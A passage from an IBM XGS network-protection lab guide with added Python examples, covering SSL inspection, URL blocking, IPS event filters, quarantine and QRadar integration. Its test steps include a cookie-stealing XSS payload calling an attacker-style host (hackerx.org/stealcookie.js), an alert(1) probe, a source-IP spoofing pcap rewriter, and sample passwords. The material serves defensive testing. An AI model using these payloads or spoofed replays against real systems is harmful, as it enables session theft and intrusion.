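def action_for(rules: List[SslRule], src: str, dst: str, server_name: str) -> str:
    rule = evaluate(rules, src, dst, server_name)
    return rule.action if rule else "Pass-through"   # assumption: no match, no interception


def shadowed_rules(rules: List[SslRule]) -> List[str]:
    """Names of enabled rules that an earlier Any/Any/Any rule makes unreachable."""
    names, catch_all_seen = [], False
    for rule in sorted(rules, key=lambda r: r.order):
        if not rule.enabled:
            continue
        if catch_all_seen:
            names.append(rule.name)
        if (rule.source, rule.destination, rule.domain) == (ANY, ANY, ANY):
            catch_all_seen = True
    return names


# The policy built in this use case: Ignore traffic to the XGS LMI, inspect the rest.
LAB_POLICY = [
    SslRule(order=1, action="Ignore", destination="192.168.5.105", name="Ignore XGS LMI"),
    SslRule(order=2, action="Inspect", name="Inspect all"),
]

# The same two rules with their orders swapped: the Ignore rule can never match.
MISORDERED_POLICY = [
    SslRule(order=2, action="Ignore", destination="192.168.5.105", name="Ignore XGS LMI"),
    SslRule(order=1, action="Inspect", name="Inspect all"),
]


if __name__ == "__main__":
    # 203.0.113.10 is a documentation address standing in for an internet web server.
    print(action_for(LAB_POLICY, "192.168.5.203", "192.168.5.105", "xgs.coe.local"))  # Ignore
    print(action_for(LAB_POLICY, "192.168.5.203", "203.0.113.10", "twitter.com"))     # Inspect
    print(shadowed_rules(MISORDERED_POLICY))                                          # ['Ignore XGS LMI']
```

shadowed_rules is the check to run after every deploy of this policy: a catch-all Inspect rule that has drifted to Order 1 silently turns every later exception into dead configuration.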
Configuring a Network Access Policy rule
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects, leave the others in Available Objects.
On the Destination tab, add Any to Added Objects, leave the others in Available Objects.
On the Application tab, click the New button and select URL List.
Tip: The Network Protection database provides an indexed list of URL categories that you
might want to block or limit on your network. You can also create custom lists of URLs that are
not covered by the categories in the database. Such custom URL objects can serve as a
"black list," which blocks traffic to specific URLs, or as a "white list," which allows access to
specific URLs even if they fall in a category you have otherwise blocked.
Example: If you want to allow access to specific web mail sites, such as gmail.com and
mail.yahoo.com, but block all other web mail sites, create a rule that blocks the category
"Web mail" along with a higher-priority rule that allows those specific web mail sites.
In the Add URL List object window, enter a name that describes the application object. This
example uses Block URL List. Then type the URLs to include in the custom URL object, such
as *twitter.com/metasploit*. Click the Save Configuration button when you are done.
Tip: Use an asterisk (*) to denote a wildcard pattern match or a question mark (?) to denote a
single wildcard character. For example, *google.com/* captures any content in the google.com
domain. Note that a leading asterisk also matches any other host whose name merely ends in
google.com, so anchor the host part (for example *://google.com/* and *://*.google.com/*)
when the list is meant to allow rather than block.
Add the new URL List to Added Objects.
On the Inspection tab, add the Default IPS object to Added Objects. On the Schedule tab,
leave Added Objects empty. Save the configuration and deploy the changes.
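Wildcard matching and rule precedence for URL List objects, as an added Python example (not XGS code): it translates the * and ? wildcards into a regular expression, evaluates Network Access rules in Order with the first match winning, and reproduces the tip above (allow gmail.com and mail.yahoo.com ahead of a rule that blocks the Web mail category) together with this use case's block on twitter.com/metasploit. The category lookup is a constructed table standing in for the Network Protection database, and first-match ordering with a final Accept is an assumption. The example also shows why the block only works once the session is decrypted: without SSL inspection the policy engine sees nothing but the server name, so a pattern that contains a path cannot match.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit


def wildcard_to_regex(pattern: str) -> "re.Pattern[str]":
    """'*' matches any run of characters, '?' exactly one; everything else is literal."""
    parts = []
    for ch in pattern:
        parts.append(".*" if ch == "*" else "." if ch == "?" else re.escape(ch))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def url_matches(pattern: str, url: str) -> bool:
    """Match against the full URL and, for patterns without a scheme, the scheme-less form."""
    regex = wildcard_to_regex(pattern)
    bare = url.split("://", 1)[1] if "://" in url else url
    return bool(regex.match(url) or regex.match(bare))


def normalize(url: str) -> str:
    """Canonical form: lower-case scheme and host, explicit '/' path, query kept."""
    p = urlsplit(url)
    query = f"?{p.query}" if p.query else ""
    return f"{p.scheme.lower()}://{p.netloc.lower()}{p.path or '/'}{query}"


def observable(url: str, decrypted: bool) -> str:
    """What the policy engine can see: the whole URL after decryption, otherwise
    only the server name learnt from SNI or the certificate."""
    p = urlsplit(url)
    return normalize(url) if decrypted else f"{p.scheme.lower()}://{p.netloc.lower()}/"


@dataclass(frozen=True)
class AccessRule:
    order: int
    action: str                          # "Accept" or "Reject"
    url_list: Tuple[str, ...] = ()       # URL List object (wildcard patterns)
    category: Optional[str] = None       # URL category object
    name: str = ""


# Constructed stand-in for the URL category database (host -> category).
CATEGORY_DB: Dict[str, str] = {
    "gmail.com": "Web mail", "mail.google.com": "Web mail",
    "mail.yahoo.com": "Web mail", "outlook.live.com": "Web mail",
    "twitter.com": "Social networking",
}


def category_of(url: str) -> Optional[str]:
    return CATEGORY_DB.get((urlsplit(url).hostname or "").lower())


def rule_matches(rule: AccessRule, url: str) -> bool:
    """A rule matches when every object it carries matches; an empty object means Any."""
    if rule.url_list and not any(url_matches(p, url) for p in rule.url_list):
        return False
    if rule.category is not None and category_of(url) != rule.category:
        return False
    return True


def decide(rules: List[AccessRule], url: str, decrypted: bool = True) -> Tuple[str, str]:
    """First matching rule in Order wins; no match falls through to Accept (assumption)."""
    seen = observable(url, decrypted)
    for rule in sorted(rules, key=lambda r: r.order):
        if rule_matches(rule, seen):
            return rule.action, rule.name
    return "Accept", "default"


# The tip's web-mail exception ahead of the category block, plus this use case's block rule.
LAB_POLICY = [
    AccessRule(1, "Accept", url_list=("*://gmail.com/*", "*://mail.google.com/*",
                                      "*://mail.yahoo.com/*"), name="Allow listed web mail"),
    AccessRule(2, "Reject", category="Web mail", name="Block Web mail category"),
    AccessRule(3, "Reject", url_list=("*twitter.com/metasploit*",), name="Block URL List"),
]


if __name__ == "__main__":
    print(decide(LAB_POLICY, "https://twitter.com/metasploit"))                   # ('Reject', 'Block URL List')
    print(decide(LAB_POLICY, "https://twitter.com/metasploit", decrypted=False))  # ('Accept', 'default')
    print(decide(LAB_POLICY, "https://outlook.live.com/mail"))                    # ('Reject', 'Block Web mail category')
    print(url_matches("*google.com/*", "https://notgoogle.com/"))                 # True: a leading * is too broad
```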
Downloading the CA certificate from XGS
Before you can inspect traffic based on the rules you configure in the Outbound SSL
Inspection policy, you must determine which signing certificate XGS uses for the proxy
certificates it presents to clients, and then download that CA certificate from XGS for
distribution to the client machines.
Click the Manage System Settings link from the main menu and then select Outbound SSL
Inspection Certificates.
Select the check box for the built-in Default CA and click Download.
Any client that trusts this CA accepts every certificate XGS issues, so treat its private key on
the appliance as you would an enterprise CA key, and in production distribute the certificate
through your normal trust-store management (for example, group policy) rather than by hand.
Copy the downloaded cert.pem file to the client machine where the user will use a web browser
to access websites.
Configuring the client’s Web Browser with the CA certificate
from XGS
Use the Firefox browser for this use case. On the client machine, launch the Firefox browser and
navigate to Options under Tools. Click the Advanced icon and then click the View Certificates
button on the Certificates tab.
On the Authorities tab, click the Import button.
Browse to the downloaded cert.pem file and click Open.
Select the Trust this CA to identify websites check box and then click OK. The browser now
trusts any server certificate issued by the built-in CA.
Click OK to apply changes.
Click OK to confirm and exit.
To test the proxy certificate, use the browser to navigate to https://google.com.
Click the lock icon to see the server certificate information. It shows that the website has been
verified by XGS. Click the More Information button to see the details of the server certificate.
Click the View Certificate button.
It shows that the server certificate is issued by the built-in XGS CA to www.google.com.
Accessing the SSL-enabled website
Launch a web browser and navigate to https://twitter.com/metasploit.
XGS intercepts the HTTPS traffic, and the Network Access Policy rule blocks access to the
URL.
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
Configuring an Outbound SSL Inspection policy to block web-based attacks over HTTPS
This use case describes how XGS blocks web-based attacks carried over HTTPS. In this
example, XGS decrypts HTTPS traffic to google.com and detects the HTTP GET requests
inside it with the HTTP_Get signature. From the client's point of view, the Google web server
presents an SSL server certificate issued by the XGS CA, which the browser treats as
untrusted unless the CA certificate has been imported as in the previous use case.
This chapter also describes how to configure the server certificate verification settings for
Outbound SSL Inspection on XGS.
Configuring SSL Inspection Settings
Click the Manage System Settings from the main menu and then click SSL Inspection
Settings under Network Settings.
The Certificate Verification Options tab provides options to block access if the server uses
unexpected server certificates.
The Trusted Certificate Authorities tab contains the list of trusted CA root certificates.
Tip: These options help identify connectivity issues with an SSL-enabled server. Some
SSL-enabled servers use certificates issued by a CA that is not in this list. If the server
certificate is invalid, XGS by default blocks the SSL/TLS connection and creates no record in
the Event Log; the web browser on the client machine only reports a problem with the network
connection. When users report such failures, check the certificate verification options before
looking for a network fault.
Accessing the Intrusion Prevention Policy
Launch a web browser to log on to the local management interface of XGS. To navigate to the
Intrusion Prevention Policy, click the Secure Policy Configuration link from the main menu and
then click Intrusion Prevention Policy under the Security Policies.
Accessing the Default IPS object
Expand the left panel. Select the Default IPS object.
Editing the Default IPS object
Right-click the Default IPS object and select Edit.
Setting the Trust X-Force Default
Set the X-Force Protection Level Signatures as Aggressive and select Enable X-Force
Protection Level Blocking.
Note: To simplify the deployment of XGS in real-life environments, IBM X-Force specifies the
default signatures and recommended responses, such as Block, in each X-Press Update (XPU).
Enabling an Event Log
Add the Event Log object to Added Objects. Save the configuration and deploy the changes.
Enabling the HTTP_Get audit signature in the Default IPS object
On the Security Events tab, click the filter button and specify a filter using the criteria shown
in the next figure (Match: all rules, Column: Event Name, Condition: is, Value: HTTP_Get).
Enable the HTTP_Get security event to detect all HTTP GET requests. Save the configuration
and deploy the changes. Because HTTP_Get fires on every GET request, disable it again after
the test; on a production link it would flood the IPS Event Log.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Add/Edit a rule so that at least one rule uses the Default IPS object for inspecting network
packets for attacks. Enable the rule, set the Source to Any, set the Destination to Any, set the
Action to Accept. Save the configuration and deploy the changes.
Simulating an attack over HTTPS
Launch a web browser on the client machine and navigate to https://google.com.
XGS decrypts the HTTPS traffic and detects the HTTP GET requests to Google with the
HTTP_Get audit signature.
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an event for the
associated attack.
You can hover the mouse over an event to see more details about the attack events.
Configuring the Inbound SSL Inspection policy to decrypt inbound HTTPS traffic
This use case describes how to configure the Inbound SSL Inspection policy to decrypt SSL
traffic from external clients to internal SSL-enabled servers. XGS inspects the decrypted traffic
and blocks attacks. In this example, XGS decrypts the SSL traffic to an Apache HTTP server.
Important: If you configured an Outbound SSL Inspection policy and assigned an IP address to
the protection interface as shown in the previous steps, clear both settings before starting this
use case.
Note: The Inbound SSL Decryption feature does not support the SSL session cache or TLS
session tickets. The Diffie-Hellman key exchange is also not supported, because inbound SSL
inspection does not use the MITM approach: it decrypts passively with the server's private key,
which only works when the key exchange is RSA. These features must be disabled on the SSL
servers for decryption to succeed. In this example, modify the
/etc/apache2/mods-enabled/ssl.conf file as shown below and restart the Apache server.
SSLCipherSuite HIGH:MEDIUM:!ADH:!DH
SSLSessionCache none
SSLSessionCacheTimeout 0
SSLProtocol SSLv3
Two cautions on this lab configuration. The OpenSSL keyword !DH removes DH and DHE
suites but not ECDHE suites, which defeat passive decryption just as well; if TLS is enabled on
the server, restrict it to RSA key exchange with kRSA instead. Restricting the protocol to SSLv3
sidesteps TLS session tickets, but SSLv3 is obsolete and insecure; do not carry this protocol
restriction into production.
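Why those settings are required, as an added Python example with toy-sized numbers (illustrative code, not IBM's): inbound inspection is passive, so with RSA key exchange the holder of the server's private key can recover the premaster secret the client encrypted and derive the same session key, whereas with Diffie-Hellman the transcript carries only g^a and g^b and the server's private key is of no help. The primes, generator, unpadded textbook RSA and the SHA-256 stand-in for the TLS key schedule are all constructed for the demonstration and far too small for real use.

```python
import hashlib
import secrets
from typing import Dict, Optional, Tuple

# Toy RSA parameters (constructed; never use sizes like this for real keys).
P_RSA, Q_RSA = 1000003, 1000033
E_RSA = 65537

# Toy Diffie-Hellman group (constructed; a real group is thousands of bits).
P_DH = 2147483647      # 2^31 - 1
G_DH = 7


def rsa_keygen() -> Tuple[Tuple[int, int], Tuple[int, int]]:
    """Return ((n, e), (n, d)) for the toy modulus."""
    n = P_RSA * Q_RSA
    d = pow(E_RSA, -1, (P_RSA - 1) * (Q_RSA - 1))
    return (n, E_RSA), (n, d)


def session_key(premaster: int) -> bytes:
    """Stand-in for the TLS key schedule: both ends derive keys from the premaster."""
    return hashlib.sha256(premaster.to_bytes(16, "big")).digest()


def rsa_client_key_exchange(pub: Tuple[int, int], premaster: int) -> int:
    """ClientKeyExchange with RSA: the client encrypts the premaster under the
    server's public key (textbook RSA here, no padding)."""
    n, e = pub
    return pow(premaster, e, n)


def rsa_inspector_recover(priv: Tuple[int, int], ciphertext: int) -> bytes:
    """A passive inspector holding the server's private key decrypts the captured
    ClientKeyExchange and derives the same session key as both endpoints."""
    n, d = priv
    return session_key(pow(ciphertext, d, n))


def dh_exchange() -> Dict[str, int]:
    """Ephemeral DH: each side keeps its exponent; only A and B cross the wire."""
    a = secrets.randbelow(P_DH - 2) + 1
    b = secrets.randbelow(P_DH - 2) + 1
    A = pow(G_DH, a, P_DH)
    B = pow(G_DH, b, P_DH)
    return {"A": A, "B": B,
            "client_secret": pow(B, a, P_DH),
            "server_secret": pow(A, b, P_DH)}


def dh_inspector_recover(transcript: Dict[str, int],
                         server_priv: Tuple[int, int]) -> Optional[bytes]:
    """What a passive inspector can do with a DH handshake: nothing. The transcript
    holds only the public values, and the server's RSA key signed the exchange
    rather than encrypting anything, so there is no ciphertext to open."""
    _ = (transcript["A"], transcript["B"], server_priv)   # everything observed
    return None


if __name__ == "__main__":
    pub, priv = rsa_keygen()
    premaster = secrets.randbelow(pub[0])
    ct = rsa_client_key_exchange(pub, premaster)
    print(rsa_inspector_recover(priv, ct) == session_key(premaster))   # True
    dh = dh_exchange()
    print(dh["client_secret"] == dh["server_secret"])                  # True
    print(dh_inspector_recover({"A": dh["A"], "B": dh["B"]}, priv))    # None
```

The same property that makes RSA key exchange decryptable here is what makes the exported private key so sensitive: with it, every recorded session to the server can be opened after the fact.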
Preparing the SSL certificate and private key of target servers
In this test environment, the target web application server is an Apache HTTP server. For an
Apache HTTP server, the paths of the SSL server certificate file and its private key file are
specified in the HTTP server configuration file (for example, httpd.conf) or the mod_ssl
configuration file (for example, ssl.conf).
In this example, the SSL server certificate is located in the /etc/ssl/certs/ directory, and the
private key is located in /etc/ssl/private/.
Download the SSL certificate file and private key file to an administration PC that has access to
the LMI. In the following steps, these files are imported to XGS by using the LMI.
Note: XGS supports certificate and key files in PKCS#12 or PEM format. A PKCS#12 (p12) file
contains both the SSL certificate and the private key and is protected with a password. In PEM
format, the certificate and the private key are separate files; each is base64-encoded and can
be copied with a text editor.
Tip: If the PEM private key is encrypted, you can use the following OpenSSL command to
decrypt it and create a new PEM file.
# openssl rsa -in encrypted_key.pem -out decrypted_key.pem
The decrypted key can open every past and future RSA-key-exchange session to that server, so
handle the unencrypted file as you would the server's own key: transfer it over a protected
channel and delete it from the administration PC once the import is complete.
Configuring Inbound SSL Certificates
Log on to the LMI and navigate to Manage System Settings > Network Settings > Inbound
SSL Certificates.
Click the New button and enter the PEM data for the SSL server certificate and its private key,
which you downloaded in previous steps.
Save the configuration and deploy the changes.
Configuring the Inbound SSL Inspection Policy
Click the Secure Policy Configuration link from the main menu and then click Inbound SSL
Inspection Policy under the Security Policies.
Click the New button to open the Add SSL Rule window. On the General Configuration tab,
enter 1 in the Order field. Select the Enable check box. Set the Action to Decrypt.
Select the Destination tab and select New > Host Address for the target HTTPS server.
Tip: You can use the List of Addresses object for adding new SSL servers during an
evaluation or a deployment project.
Enter the IP address of the target SSL server (192.168.5.111 in this environment) and then click
Save Configuration.
On the Destination tab, add the newly created Host Address object (web servers) to Added
Objects.
For demonstration or testing, select both check boxes on the Alert Condition tab so that the
result of each decryption attempt is logged as a System Event. This lets you verify the
decryption process while you configure the Inbound SSL Inspection policy.
You can clear the Alert On Success check box after confirming that decryption completes
successfully; leave the failure alert enabled so that a later server-side change (a renewed
certificate, or DH suites or session tickets re-enabled) is visible in the log.
Save the configuration and deploy the changes.
Testing Inbound SSL Inspection
Launch the web browser on the external client PC and access the SSL-enabled website hosted
in the internal network (192.168.5.111).
To navigate to the System Events, click the Monitor Analysis and Diagnostics link from the
main menu and then click Event Log. Select the System Events tab.
Configuring the IPS Event Filter
This use case describes how to configure the IPS Event Filter policy to tune the Threat
(Severity) Level and responses for a specific Intrusion Prevention Policy rule (security
events/signature).
Note: IPS event filters offer you the ability to change settings for a single security event or for a
group of security events without having to create new Network Access policies or
Intrusion Prevention policies. The IPS Event Filter policy is similar to the Network
Access Policy in that it is a single entity that you add rules to.
Tip: IPS event filter settings always override preconfigured security event settings.
Tip: If a security event is disabled in the Intrusion Prevention Policy, its IPS event
filter is also disabled.
Accessing the IPS Event Filter policy
To navigate to the IPS Event Filter policy, click the Secure Policy Configuration link from the
main menu and then click IPS Event Filter policy under the Security Policies.
Click the New button to add an IPS Event Filter rule.
Enter 1 in the Order field, select the Enable check box, set the Action to Block, and set the
Threat Level to High.
On the Response tab, add the Event Log object to Added Objects.
On the Intruder tab, add Any to Added Objects and leave the others in Available Objects.
On the Victim tab, add Any to Added Objects and leave the others in Available Objects.
On the Service tab, no setting is required.
On the Security Events tab, click the filter button and specify a filter using the criteria
shown in the next figure (Match: all rules, Column: Available Events, Condition: contains, Value:
post_script).
On the Security Events tab, add HTTP_Post_Script to Added Events. Save the configuration
and deploy the changes.
Simulating a Web Application attack
Launch a browser and access the vulnerable web server hosted by IBM. Click the Feedback
link.
Adding a script to the feedback entry
Type the following text: <script src="http://hackerx.org/stealcookie.js"></script>. Click
Submit.
XGS blocks the access.
XGS generates a Security Event with a different Threat Level
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an event for the
associated attack.
Configuring a packet-capture response to log
evidence of an attack
This use case describes how to configure the IPS Event Filter policy to include a
packet-capture response for a specific signature.
Accessing the IPS Event Filter policy
To navigate to the IPS Event Filter policy, click the Secure Policy Configuration link from the
main menu and then click IPS Event Filter policy under the Security Policies.
Click the New button to add an IPS Event Filter rule.
On the Response tab, add the Capture Packet object to Added Objects. Save the configuration
and deploy the changes.
Simulating a Web Application attack
Launch a browser and access the vulnerable web server. Click the Feedback link.
Adding a script to the feedback entry
Type the following text: <script src="http://hackerx.org/stealcookie.js"></script>. Click
Submit.
XGS blocks the access.
XGS generates an IPS Event and the associated packet capture
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an event for the
associated attack.
To navigate to Packet Captures, click the Manage System Settings link from the main menu and
then click Packet Captures under the System Settings.
Download the packet capture.
Open the packet capture in Wireshark to analyze the contents that triggered the event.
Configuring a Quarantine response
This use case describes how to configure the IPS Event Filter policy with the Quarantine
object to create a quarantine rule for a specific signature. This helps suppress persistent
threats, for example by blocking external attackers further upstream or by containing a possible
malware infection during an internal outbreak.
Creating an IPS Event Filter policy with a Quarantine object
To navigate to the IPS Event Filter policy, click the Secure Policy Configuration link from the
main menu and then click IPS Event Filter policy under the Security Policies.
Click the New button to add an IPS Event Filter rule.
Enter 1 in the Order field, select the Enable check box, set the Action to Block, and set the
Threat Level to High.
On the Response tab, click New > Quarantine to create a new Quarantine object.
Type the following values and select the Intruder Address and Intruder Port check boxes.
Note: Five types of quarantine are available in XGS, but you can use only the
Intrusion quarantine type with the IPS Event Filter rule and IPS Object. Other types
of quarantine are used as responses for the Advanced Threat Policy.
On the Response tab, add the Event Log object and the test Quarantine object to Added Objects.
On the Security Events tab, add the HTTP_Post_Script event to Added Events.
Save the configuration and deploy the changes.
Note: On the Service Object tab, you can define a service object to filter IPS
Events based on protocols such as TCP, UDP, ICMP and ICMPv6 and on the service port
numbers of the Victim and Intruder.
Simulating a web application attack
Launch a browser and access the vulnerable web server hosted by IBM. Click
the Feedback link.
Type the following text: <script>alert(1)</script> as Email Address. Click Submit.
XGS blocks the attack and the web browser displays a timeout error. XGS also creates a
quarantine rule to block the source IP address and the source port.
Verifying the IPS Event Filter response and quarantine rule
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an
HTTP_Post_Script event with a High severity level, as configured in the IPS Event Filter.
Select the System Events tab and verify the system event that was triggered due to the creation
of a quarantine rule by the IPS Event Filter.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the active quarantine rule that was created.
Configuring the IP reputation, IP location, and
IDS (monitoring) mode
This use case describes how to configure the IP Reputation database so that the events
generated by XGS include IP Reputation and IP Location information. IP Reputation and IP
Location provide reputation and geographic location information for both the source and target IP
addresses of an event. For example, if a given source IP address is flagged as being a
source of spam and is located in a country rated as high for spam origination, the source IP
address in question is likely a spam source. In this use case, traffic is generated to simulate traffic
originating from a malicious source.
Tip: To receive updates to application and IP reputation databases, you must enable
auto updating. You cannot manually update application and IP reputation databases.
XGS requires a connection to the Internet to download updates for the application
and IP reputation databases.
Ensuring that the IP Reputation Database is updated
The Overview page displays current information about the Network Protection XGS firmware,
intrusion prevention content, update servers, licenses, and the XGS performance level. To
navigate to the Overview page, click the Manage System Settings link from the main menu and
then click Overview under Updates and Licensing. Take note of the status and last update
information for the IP Reputation Database. IBM provides updates to the database daily.
Enabling the IP Reputation for events
To navigate to the Manage Application Databases page, click the Manage System Settings link
from the main menu and then click Application Database Settings under Updates and
Licensing.
Select the Include IP Reputation Info check box. Save the configuration and deploy the
changes.
Configuring the Inspection mode for the Protection Interfaces
To navigate to Protection Interfaces, click the Manage System Settings link from the main
menu and then click Protection Interfaces under the Network Settings.
Set the Inspection Mode for the respective ports to Monitoring. Save the configuration and
deploy the changes.
Simulating traffic
To test traffic from external IP addresses, create an attack packet and modify its source IP
address.
Connect a Linux VM to a protection port.
Change the source IP address of the provided attack packet data using the tcprewrite command.
In this example, change 192.168.5.1 to 91.216.73.32 in
HTTP_GET_SQL_UnionSelect.pcap.
Replay the crafted packet capture using the tcpreplay command.
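The rewrite step above, as an added example rather than the guide's own procedure: a small Python stand-in for tcprewrite that changes the IPv4 source address in a pcap, repairs the IP and TCP/UDP checksums that the change invalidates, and lets you verify them before the file is handed to tcpreplay. The capture it rewrites is constructed inline (a plain HTTP GET from 192.168.5.1, not the guide's HTTP_GET_SQL_UnionSelect.pcap), and the checksum-verification helper is this example's own, not part of the tcpreplay suite.

```python
"""Rewrite the IPv4 source address in a pcap and repair the checksums.

Added example (not from the IBM guide, not tcprewrite's own code): a pure-Python
stand-in for the tcprewrite step (192.168.5.1 -> 91.216.73.32). Assumes a
little-endian classic pcap (magic 0xa1b2c3d4, link type 1 = Ethernet) carrying
untagged IPv4; other frames are copied through unchanged.
"""
import socket
import struct

PCAP_GLOBAL_HDR = struct.Struct("<IHHiIII")  # magic, major, minor, zone, sigfigs, snaplen, linktype
PCAP_REC_HDR = struct.Struct("<IIII")        # ts_sec, ts_usec, incl_len, orig_len
ETH_HDR_LEN = 14
PROTO_TCP, PROTO_UDP = 6, 17


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement sum over 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def rewrite_ipv4_frame(frame: bytes, old_src: str, new_src: str) -> bytes:
    """Return the frame with its IPv4 source replaced and IP/TCP/UDP checksums fixed."""
    if len(frame) < ETH_HDR_LEN + 20 or frame[12:14] != b"\x08\x00":
        return frame  # not IPv4 over Ethernet: copy through unchanged
    ip = bytearray(frame[ETH_HDR_LEN:])
    ihl = (ip[0] & 0x0F) * 4
    if ip[12:16] != socket.inet_aton(old_src):
        return frame  # a different sender: leave untouched
    ip[12:16] = socket.inet_aton(new_src)
    # The IP header checksum covers only the header: recompute it with the field zeroed.
    ip[10:12] = struct.pack("!H", inet_checksum(bytes(ip[:10]) + b"\x00\x00" + bytes(ip[12:ihl])))
    proto = ip[9]
    total_len = struct.unpack("!H", bytes(ip[2:4]))[0]
    # TCP/UDP checksums cover a pseudo-header that contains the source address, so they break
    # too (tcprewrite --fixcsum repairs them); an IPS may discard packets with bad checksums.
    if proto in (PROTO_TCP, PROTO_UDP) and len(ip) >= total_len and total_len - ihl >= 8:
        csum_off = 16 if proto == PROTO_TCP else 6
        seg = bytearray(ip[ihl:total_len])
        seg[csum_off:csum_off + 2] = b"\x00\x00"
        pseudo = bytes(ip[12:20]) + struct.pack("!BBH", 0, proto, len(seg))
        csum = inet_checksum(pseudo + bytes(seg))
        if proto == PROTO_UDP and csum == 0:
            csum = 0xFFFF  # UDP: zero means "no checksum", so send all-ones instead
        seg[csum_off:csum_off + 2] = struct.pack("!H", csum)
        ip[ihl:total_len] = seg
    return frame[:ETH_HDR_LEN] + bytes(ip)


def iter_records(data: bytes):
    """Yield (record header tuple, frame bytes) for each packet in a pcap byte string."""
    off = PCAP_GLOBAL_HDR.size
    while off + PCAP_REC_HDR.size <= len(data):
        hdr = PCAP_REC_HDR.unpack_from(data, off)
        off += PCAP_REC_HDR.size
        yield hdr, data[off:off + hdr[2]]
        off += hdr[2]


def rewrite_pcap(data: bytes, old_src: str, new_src: str) -> bytes:
    """Rewrite every matching IPv4 packet in a pcap; returns the new pcap bytes."""
    magic, _, _, _, _, _, linktype = PCAP_GLOBAL_HDR.unpack_from(data, 0)
    if magic != 0xA1B2C3D4 or linktype != 1:
        raise ValueError("expected a little-endian classic pcap with Ethernet link type")
    out = bytearray(data[:PCAP_GLOBAL_HDR.size])
    for hdr, frame in iter_records(data):
        out += PCAP_REC_HDR.pack(*hdr) + rewrite_ipv4_frame(frame, old_src, new_src)
    return bytes(out)


def checksums_valid(frame: bytes) -> bool:
    """True if the IPv4 header checksum and the TCP/UDP checksum of the frame verify."""
    ip = frame[ETH_HDR_LEN:]
    ihl = (ip[0] & 0x0F) * 4
    proto, total_len = ip[9], struct.unpack("!H", ip[2:4])[0]
    if inet_checksum(ip[:ihl]) != 0:
        return False
    if proto not in (PROTO_TCP, PROTO_UDP):
        return True
    seg = ip[ihl:total_len]
    return inet_checksum(ip[12:20] + struct.pack("!BBH", 0, proto, len(seg)) + seg) == 0


def build_sample_pcap() -> bytes:
    """Constructed one-packet capture: 192.168.5.1:40000 -> 192.168.5.111:80, HTTP GET."""
    payload = b"GET / HTTP/1.1\r\nHost: 192.168.5.111\r\n\r\n"
    src, dst = socket.inet_aton("192.168.5.1"), socket.inet_aton("192.168.5.111")
    tcp = bytearray(struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 5 << 4, 0x18, 65535, 0, 0))
    pseudo = src + dst + struct.pack("!BBH", 0, PROTO_TCP, len(tcp) + len(payload))
    tcp[16:18] = struct.pack("!H", inet_checksum(pseudo + bytes(tcp) + payload))
    ip = bytearray(struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                               1, 0, 64, PROTO_TCP, 0, src, dst))
    ip[10:12] = struct.pack("!H", inet_checksum(bytes(ip)))
    frame = bytes.fromhex("001122334455" "66778899aabb" "0800") + bytes(ip) + bytes(tcp) + payload
    return (PCAP_GLOBAL_HDR.pack(0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
            + PCAP_REC_HDR.pack(0, 0, len(frame), len(frame)) + frame)
```

Write the bytes returned by rewrite_pcap to a file and replay that file with tcpreplay; run checksums_valid on each frame first so that a bad checksum, not the IP reputation lookup, is never the reason an expected event is missing.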
XGS detects the attack and identifies the IP reputation and location for the
generated event
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated events for the
associated attacks.
Configuring QRadar Right-click integration
This use case describes how to configure the QRadar Right-Click integration, which allows a
QRadar operator/analyst to right-click an IP address in the QRadar Console and create a
quarantine rule on XGS to block the traffic to or from the IP address. In this example, QRadar
generates an offense for a suspicious communication from a compromised client PC and the
analyst assesses the flow data and blocks all communication from the PC using QRadar
Right-Click integration.
Configuring a QRadar Advanced Threat Protection agent on
XGS
Log on to the LMI and navigate to Manage System Settings > Network Settings > Advanced
Threat Protection Agents.
Click the New button and enter the following parameters:
Name: qradar (you can specify a name to identify this configuration)
Agent Type: QRadar
Address: 192.168.5.101 (IP address of QRadar Console)
User name: qradar_atp
Password: Passw0rd
Save the configuration changes.
Configuring the RightClick module on the QRadar console
Download the RightClick-ISNP-Alert RPM from the IBM Download Center.
Note: The RightClick module supports QRadar Console version 7.2 MR1
(7.2.1.694499) and above.
Copy the RPM file to a folder on the QRadar Console using an SCP client and type the following
command to install the RPM.
Edit the isnp_alert.conf file using the vi command.
Specify the endpoint URL parameter (https://<xgs management IP
address>/agent_alert_listener) and the credentials, and save the changes.
Note: The credentials specified in the isnp_alert.conf file must match the
credentials that you used when you configured the QRadar Advanced Threat
Protection agent on XGS in the previous step.
Tip: To send Advanced Threat Policy (ATP) events to multiple XGS appliances,
duplicate the three lines and specify different label names as shown below.
first_label.endpoint=https://xgs1.example.com/agent_alert_listener
first_label.username=admin1
first_label.password=Passw1rd
second_label.endpoint=https://xgs2.example.com/agent_alert_listener
second_label.username=admin2
second_label.password=Passw2rd
